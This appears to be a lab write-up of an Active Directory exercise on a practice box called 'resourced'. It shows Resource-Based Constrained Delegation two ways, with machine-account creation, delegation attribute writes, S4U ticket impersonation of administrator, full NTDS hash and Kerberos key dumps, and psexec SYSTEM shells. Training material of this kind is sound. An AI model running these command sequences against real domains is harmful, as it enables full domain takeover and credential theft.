InfoSec LAB

Resourced_Privilege_Escalation

Created: 8 min read

Resource-Based Constrained Delegation

The target domain has been identified to contain a critical misconfiguration due to granting a domain user the GenericAll access over the DC host, potentially leading to the Resource-based Constrained Delegation attack

Local (PowerView.ps1 and Powermad.ps1)

*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> upload Powermad.ps1
 
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/resourced/Powermad.ps1 to C:\Users\L.Livingstone\Documents\Powermad.ps1
Data: 180780 bytes of 180780 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> upload PowerView.ps1
 
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/resourced/PowerView.ps1 to C:\Users\L.Livingstone\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
 
 
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> . .\Powermad.ps1

Delivery complete

*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
[+] Machine account attackersystem added

Since there isn’t any account with a configured SPN that I can control, I can first leverage the default SeMachineAccountPrivilege access to create a domain computer object,attackersystem$:Summer2018!, via the Powermad’s New-MachineAccount cmdlet

*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> $ComputerSid
S-1-5-21-537427935-490066102-1511301751-4101

Then, I can use PowerView’s Get-DomainComputer cmdlet to retrieve and store the SID of the newly created computer object (attackersystem$)

Arbitrary ACE with SID

*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" ; $SDBytes = New-Object byte[] ($SD.BinaryLength) ; $SD.GetBinaryForm($SDBytes, 0)

Then, an arbitrary ACE must be built with the SID of the newly created computer object (attackersystem$) and get the binary bytes for the newly created arbitrary DACL/ACE . This will become part of the SD (Security Descriptor) of the target object (ResourceDC$)

Delegation

*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> Get-DomainComputer ResourceDC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Lastly, the msds-allowedtoactonbehalfofotheridentity attribute of the target object (ResourceDC$) must be modified to contain the created ACE above

Impersonation

Now, I just need to request a service ticket to the ResourceDC$ host as the newly created computer account (attackersystem$) with the granted delegation right

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ bloodyAD -d RESOURCED.LOCAL -u 'attackersystem$' -p 'Summer2018!' --host ResourceDC.resourced.local get object 'CN=ResourceDC,OU=DOMAIN CONTROLLERS,DC=RESOURCED,DC=LOCAL' --attr servicePrincipalName
 
distinguishedName: CN=ResourceDC,OU=DOMAIN CONTROLLERS,DC=RESOURCED,DC=LOCAL
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/ResourceDC.resourced.local; ldap/ResourceDC.resourced.local/ForestDnsZones.resourced.local; ldap/ResourceDC.resourced.local/DomainDnsZones.resourced.local; TERMSRV/RESOURCEDC; TERMSRV/ResourceDC.resourced.local; DNS/ResourceDC.resourced.local; GC/ResourceDC.resourced.local/resourced.local; RestrictedKrbHost/ResourceDC.resourced.local; RestrictedKrbHost/RESOURCEDC; RPC/1f8b2b45-398a-449c-8712-a132f62b4567._msdcs.resourced.local; HOST/RESOURCEDC/resourced; HOST/ResourceDC.resourced.local/resourced; HOST/RESOURCEDC; HOST/ResourceDC.resourced.local; HOST/ResourceDC.resourced.local/resourced.local; E3514235-4B06-11D1-AB04-00C04FC2DCD2/1f8b2b45-398a-449c-8712-a132f62b4567/resourced.local; ldap/RESOURCEDC/resourced; ldap/1f8b2b45-398a-449c-8712-a132f62b4567._msdcs.resourced.local; ldap/ResourceDC.resourced.local/resourced; ldap/RESOURCEDC; ldap/ResourceDC.resourced.local; ldap/ResourceDC.resourced.local/resourced.local

and there are a lot of SPNs to choose from. I will go with the generic ldap/ResourceDC.resourced.local SPN

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-getST 'RESOURCED.LOCAL/attackersystem$' -spn 'ldap/ResourceDC.resourced.local' -impersonate administrator -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@ldap_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache

Impersonation complete. Service ticket saved

Hashdump

ResourceDC.resourced.local' -impersonate administrator -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@ldap_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache
                                                                                                         
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=administrator@ldap_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache impacket-secretsdump RESOURCED.LOCAL/@ResourceDC.resourced.local -no-pass -k -dc-ip $IP 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0aa9afb28ea147cc3ea3f6a974e2ba65:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
resourced\RESOURCEDC$:plain_password_hex:5dcce8518a6c8853398f1c46524c2accd8a0eba36e81604dea4d0c3c8a3a53475835999b4266cc6cd107a563d809fa9f3dbdb7ed36608e63d1e1431e0f9f808eb13bc918bec4efe385ff3bf4868a8485a9100d84bfb51b4fd7322401a380c510f6c3aecd2c0963b83fff70a113e687a2c4486f44613faf99298411e3153dcb27eb44fc664ae719d63e738402cf5c553308022567cebd60623d080dd52035ac2587f9fce89ef745a3e3588e0f6e024a7a6ec93620dd2f594c1e94d923f33376cf1f6c3ed3893b09084f3df361ed0d7fc10ee9e048b830f595417db2f0a15eecca7e02464e0d4e7fa0d81ddc12d6d62bbd
resourced\RESOURCEDC$:aad3b435b51404eeaad3b435b51404ee:7724afa19f9223ed26d841248e0fc0e3:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3df657e4617398e4ab73e41c6183f8ac3d608523
dpapi_userkey:0xc69b79bdce1e77b22043bbb5bd336c39d3965012
[*] NL$KM 
 0000   4A E2 C6 53 5D 77 02 C9  AE A9 48 23 7C 5B 46 39   J..S]w....H#|[F9
 0010   4A 56 02 3B CC 38 B8 C0  92 DD 41 2C 72 F2 63 46   JV.;.8....A,r.cF
 0020   71 36 1B E3 D2 BA E7 AC  8C BD E9 D5 55 36 C0 07   q6..........U6..
 0030   99 5A 11 4A 24 E4 42 E3  4C 12 3F F5 1B D7 D5 8C   .Z.J$.B.L.?.....
NL$KM:4ae2c6535d7702c9aea948237c5b46394a56023bcc38b8c092dd412c72f2634671361be3d2bae7ac8cbde9d55536c007995a114a24e442e34c123ff51bd7d58c
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8e0efd059433841f73d171c69afdda7c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7ddb984fb68a47040c0931038a0ba0b4:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:7724afa19f9223ed26d841248e0fc0e3:::
attackersystem$:4101:aad3b435b51404eeaad3b435b51404ee:ef266c6b963c0bb683941032008ad47f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8b390f83fedcfa8a5275a4a80ab1200da3c6420a502eec668fc3a23d3d8cfba5
Administrator:aes128-cts-hmac-sha1-96:efa1aa29ae0536b35a2534f0abd881a3
Administrator:des-cbc-md5:0de34cf7bf32898f
krbtgt:aes256-cts-hmac-sha1-96:a85e2a98d5c75634e9104bbd6f60507b8b22324e18e945c6b74955b02293b40f
krbtgt:aes128-cts-hmac-sha1-96:07b7d34c08ed94eafec3875bb55111d3
krbtgt:des-cbc-md5:43b6972a7abaf7d0
M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04
M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9
M.Mason:des-cbc-md5:268501b50e0bf47c
K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f
K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115
K.Keen:des-cbc-md5:572cce13b38ce6da
L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f
L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6
L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab
J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6
J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087
J.Johnson:des-cbc-md5:ea01d3d69d7c57f4
V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c
V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d
V.Ventz:des-cbc-md5:4af77a3d1cf7c480
S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085
S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a
S.Swanson:des-cbc-md5:5d37583eae1f2f34
P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb
P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230
P.Parker:des-cbc-md5:083b37079dcd764f
R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b
R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef
R.Robinson:des-cbc-md5:7051d568dfd0852f
D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a
D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3
D.Durant:des-cbc-md5:376119bfcea815f8
G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91
G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7
G.Goldberg:des-cbc-md5:3e20fd1a25687673
RESOURCEDC$:aes256-cts-hmac-sha1-96:3cd063df544e32f1e4c8533120c860fc265b1e5819752fd0e96924c6ece53d4d
RESOURCEDC$:aes128-cts-hmac-sha1-96:b58d3c0a9f598246042271a48f231a22
RESOURCEDC$:des-cbc-md5:5249d08f07923eae
attackersystem$:aes256-cts-hmac-sha1-96:fc725b5ba964448bbf28ecdc71e0d5e8a93683e71e21e830381e8b5d571d7b42
attackersystem$:aes128-cts-hmac-sha1-96:ed0a382c611b16a56905e1b152cc8a73
attackersystem$:des-cbc-md5:4629798519d689f8
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain level compromise

Shell Drop

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=administrator@ldap_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache impacket-psexec RESOURCED.LOCAL/@ResourceDC.resourced.local -no-pass -k -dc-ip $IP 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Requesting shares on ResourceDC.resourced.local.....
[*] Found writable share ADMIN$
[*] Uploading file fSyxYwoI.exe
[*] Opening SVCManager on ResourceDC.resourced.local.....
[*] Creating service UWdy on ResourceDC.resourced.local.....
[*] Starting service UWdy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
ResourceDC
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.169.175
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.169.254

System level compromise

Remote (Impacket)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=l.livingstone@ResourceDC.resourced.local.ccache impacket-addcomputer RESOURCED.LOCAL/l.livingstone@ResourceDC.resourced.local -no-pass -k -computer-name 'blah$' -computer-pass 'Qwer1234' -dc-host ResourceDC.resourced.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Successfully added machine account blah$ with password Qwer1234.

Adding a computer object; blah$:Qwer1234

Arbitrary ACE with the SID and Delegation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=l.livingstone@ResourceDC.resourced.local.ccache impacket-rbcd RESOURCED.LOCAL/l.livingstone@ResourceDC.resourced.local -no-pass -k -delegate-from 'blah$' -delegate-to 'ResourceDC$' -action write -dc-ip $IP    
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[-] invalid server address

impacket-rbcd keeps failing

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=l.livingstone@ResourceDC.resourced.local.ccache bloodyAD -d RESOURCED.LOCAL -k --host ResourceDC.resourced.local --dc-ip $IP add rbcd 'ResourceDC$' 'blah$'                          
[!] No security descriptor has been returned, a new one will be created
[+] blah$ can now impersonate users on ResourceDC$ via S4U2Proxy

Opting out to bloodyAD The command above writes the SID of the newly created blah$ account to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the ResourceDC$ host

Confirmation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ bloodyAD -d RESOURCED.LOCAL -u 'blah$' -p 'Qwer1234' --host ResourceDC.resourced.local get object 'CN=ResourceDC,OU=DOMAIN CONTROLLERS,DC=RESOURCED,DC=LOCAL' --attr msDS-AllowedToActOnBehalfOfOtherIdentity
 
distinguishedName: CN=ResourceDC,OU=DOMAIN CONTROLLERS,DC=RESOURCED,DC=LOCAL
msDS-AllowedToActOnBehalfOfOtherIdentity: O:S-1-5-32-544D:(A;OICI;CR;;;S-1-5-21-537427935-490066102-1511301751-4101)

This can be confirmed. Querying for the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the ResourceDC$ host now shows the ACE entry; A;OICI;CR;;;S-1-5-21-537427935-490066102-1511301751-4101: This is the newly created blah$ account.

Service Ticket (Impersonate)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-getST 'RESOURCED.LOCAL/blah$' -spn 'DNS/ResourceDC.resourced.local' -impersonate administrator -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@DNS_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache

This time, I will use the DNS/ResourceDC.resourced.local SPN Impersonation complete. Service ticket saved

Shell Drop

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=administrator@DNS_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache impacket-psexec RESOURCED.LOCAL/@ResourceDC.resourced.local -no-pass -k -dc-ip $IP  
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Requesting shares on ResourceDC.resourced.local.....
[*] Found writable share ADMIN$
[*] Uploading file vspROgIl.exe
[*] Opening SVCManager on ResourceDC.resourced.local.....
[*] Creating service BXdO on ResourceDC.resourced.local.....
[*] Starting service BXdO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
ResourceDC
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.169.175
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.169.254

System level compromise

Hashdump

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=administrator@DNS_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache impacket-secretsdump RESOURCED.LOCAL/@ResourceDC.resourced.local -no-pass -k -dc-ip $IP  
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0aa9afb28ea147cc3ea3f6a974e2ba65:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
resourced\RESOURCEDC$:plain_password_hex:51f48868cadcbe80bc0e572a20e9f275ab144baa1513ce1dc0d39b1febfdad600fdaec3b70a93c50712567a908591176a052887cdc39b7eccc4af203232c8e310477dfb16b2cc0ca77395322a743db1923e9cab522d65308132ed512260974c4c8ad4f8e59453689e5551854d2b29c10154e10133b95f381b26950d22eadc0023b62e83404f9f567a647c9db2dbb31e7dd3219313e5a7d776db95fcfbae663ce07daa9b87c5cc60a6f972c4a7a1ae23abeb461661227fed82d5073584ac4b1ac70c87dd96b5a44d1176ebd5543f2c3b678017394f19bcd8b0f790b713c0b2b2e6526f694a7491716c4ffaeae91291a4a
resourced\RESOURCEDC$:aad3b435b51404eeaad3b435b51404ee:53b5fae55c2dda6ebd273d411b4c1bac:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3df657e4617398e4ab73e41c6183f8ac3d608523
dpapi_userkey:0xc69b79bdce1e77b22043bbb5bd336c39d3965012
[*] NL$KM 
 0000   4A E2 C6 53 5D 77 02 C9  AE A9 48 23 7C 5B 46 39   J..S]w....H#|[F9
 0010   4A 56 02 3B CC 38 B8 C0  92 DD 41 2C 72 F2 63 46   JV.;.8....A,r.cF
 0020   71 36 1B E3 D2 BA E7 AC  8C BD E9 D5 55 36 C0 07   q6..........U6..
 0030   99 5A 11 4A 24 E4 42 E3  4C 12 3F F5 1B D7 D5 8C   .Z.J$.B.L.?.....
NL$KM:4ae2c6535d7702c9aea948237c5b46394a56023bcc38b8c092dd412c72f2634671361be3d2bae7ac8cbde9d55536c007995a114a24e442e34c123ff51bd7d58c
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8e0efd059433841f73d171c69afdda7c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7ddb984fb68a47040c0931038a0ba0b4:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:53b5fae55c2dda6ebd273d411b4c1bac:::
blah$:4101:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8b390f83fedcfa8a5275a4a80ab1200da3c6420a502eec668fc3a23d3d8cfba5
Administrator:aes128-cts-hmac-sha1-96:efa1aa29ae0536b35a2534f0abd881a3
Administrator:des-cbc-md5:0de34cf7bf32898f
krbtgt:aes256-cts-hmac-sha1-96:a85e2a98d5c75634e9104bbd6f60507b8b22324e18e945c6b74955b02293b40f
krbtgt:aes128-cts-hmac-sha1-96:07b7d34c08ed94eafec3875bb55111d3
krbtgt:des-cbc-md5:43b6972a7abaf7d0
M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04
M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9
M.Mason:des-cbc-md5:268501b50e0bf47c
K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f
K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115
K.Keen:des-cbc-md5:572cce13b38ce6da
L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f
L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6
L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab
J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6
J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087
J.Johnson:des-cbc-md5:ea01d3d69d7c57f4
V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c
V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d
V.Ventz:des-cbc-md5:4af77a3d1cf7c480
S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085
S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a
S.Swanson:des-cbc-md5:5d37583eae1f2f34
P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb
P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230
P.Parker:des-cbc-md5:083b37079dcd764f
R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b
R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef
R.Robinson:des-cbc-md5:7051d568dfd0852f
D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a
D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3
D.Durant:des-cbc-md5:376119bfcea815f8
G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91
G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7
G.Goldberg:des-cbc-md5:3e20fd1a25687673
RESOURCEDC$:aes256-cts-hmac-sha1-96:8c6bc0bf78d200a0698b80e74cdbcf5f738bc53c8a555c6694945458902797b5
RESOURCEDC$:aes128-cts-hmac-sha1-96:05d792b9a90d305c109df1ca19ed0ffd
RESOURCEDC$:des-cbc-md5:ab768673972a834a
blah$:aes256-cts-hmac-sha1-96:cc0426ffb68079baa125b318e2e139d9429671da8bb7ff8939b667fb423367b2
blah$:aes128-cts-hmac-sha1-96:0300d224b5d2e331122031b90584b069
blah$:des-cbc-md5:da0731eab51c6bd3
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain level compromise

Interactive Graph View

Backlinks